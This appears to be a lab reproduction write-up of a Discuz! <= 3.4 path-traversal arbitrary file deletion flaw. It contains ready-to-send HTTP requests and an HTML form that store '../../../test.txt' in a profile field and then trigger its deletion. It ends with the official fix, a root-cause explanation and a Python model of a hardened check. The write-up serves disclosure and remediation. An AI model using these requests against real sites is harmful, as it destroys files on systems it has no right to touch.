Preface: On September 29, Discuz! fixed a front-end (logged-in user) arbitrary file deletion vulnerability. A similar bug was reported to wooyun and to Discuz! in 2014, but the fix was incomplete and led to this one. Many sources online say the official 3.4 release already contains the fix, but the environment I used is the 3.4 image from vulhub, so rather than guess whether 3.4 is fixed or not I simply reproduced it.
Affected versions: Discuz! <= 3.4

Environment
Reproduction: first create a file named test.txt in the Discuz! directory; this is the file that will be deleted later.

Screenshot: test.txt created
Visit http://192.168.220.131/home.php?mod=spacecp, open the browser's element inspector, find the value of formhash and copy it.

Screenshot: the formhash value

Capture the request with Burp to obtain the cookie.

Screenshot: captured cookie
Send the packet below, replacing the cookie, the formhash and the file to be deleted with your own values (each multipart part needs the blank line between its headers and its value, as shown):
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
Screenshot: sending the packet that stores the path

Refresh the page; the birthplace field now shows the state in the screenshot below:

Screenshot: value written successfully

This confirms that the traversal string ../../../test.txt has been stored in the database as the birthprovince value. Nothing is deleted yet; the second request below triggers the unlink.
Next, create an upload.html with the code below, replace the IP with your Discuz! host name, and replace the formhash value (84a7f376 here) with your own:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>

Open the page in the browser where you are logged in to Discuz!, pick any file and submit.
Or build the packet directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba
-----------------------------123821742118716--

(The file content, "zerba" here, can be anything; only the upload field named birthprovince matters. Let your tool recalculate Content-Length if it does not do so automatically.)
Go back to the Discuz! directory and check: test.txt has been deleted.
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit upload/source/include/spacecp/spacecp_profile.php and remove the code around the unlink call. The root cause is that a value the user stored in a profile field is later concatenated onto the profile attachment directory and handed to unlink without any check that the result still lies inside that directory.
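To show why removing or guarding the unlink matters, here is a small model of the deletion pattern next to a hardened version. This is an added illustration written in Python, not the PHP code from spacecp_profile.php or the fix commit; the directory layout data/attachment/profile and the function names are assumptions. The hardened version is what you would do if the deletion had to stay: accept only a bare file name and confirm the resolved path is still inside the profile directory (which also defeats a symlink placed there).

```python
"""Model of "unlink(attachdir . './profile/' . $space[$key])" and a safe variant.

Simplified re-implementation for illustration only, not Discuz! code.
"""
import os
import tempfile


def vulnerable_delete(profile_dir, stored_value):
    """Risky pattern: join whatever was stored earlier onto the profile dir and unlink it."""
    path = os.path.join(profile_dir, stored_value)
    if os.path.isfile(path):
        os.unlink(path)
        return True
    return False


def hardened_delete(profile_dir, stored_value):
    """Delete only a plain file name that resolves to a direct child of profile_dir."""
    # Reject empty values and anything carrying a directory component ("../x", "a/b", ".").
    if not stored_value or stored_value != os.path.basename(stored_value) or stored_value in (".", ".."):
        return False
    root = os.path.realpath(profile_dir)
    path = os.path.realpath(os.path.join(root, stored_value))
    # realpath follows symlinks, so a link inside profile_dir pointing elsewhere is refused too.
    if os.path.dirname(path) != root:
        return False
    if os.path.isfile(path):
        os.unlink(path)
        return True
    return False


def demo():
    """Build a throwaway tree (constructed for this example) and exercise both variants.

    Returns a dict of named booleans, each True when the variant behaved as described.
    """
    with tempfile.TemporaryDirectory() as base:
        profile = os.path.join(base, "data", "attachment", "profile")
        os.makedirs(profile)
        outside = os.path.join(base, "test.txt")        # the file the attacker wants gone
        legit = os.path.join(profile, "avatar.jpg")      # a real profile attachment
        for p in (outside, legit):
            with open(p, "w") as fh:
                fh.write("x")
        traversal = "../../../test.txt"                  # the stored birthprovince value
        return {
            "hardened_refused_traversal":
                hardened_delete(profile, traversal) is False and os.path.isfile(outside),
            "hardened_deletes_own_file":
                hardened_delete(profile, "avatar.jpg") is True and not os.path.exists(legit),
            "vulnerable_followed_traversal":
                vulnerable_delete(profile, traversal) is True and not os.path.exists(outside),
        }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAILED'}")
```

The containment check on the resolved path is the part that matters; an extension allow-list alone would not have helped here, because ../../../test.txt can be given any suffix the attacker likes.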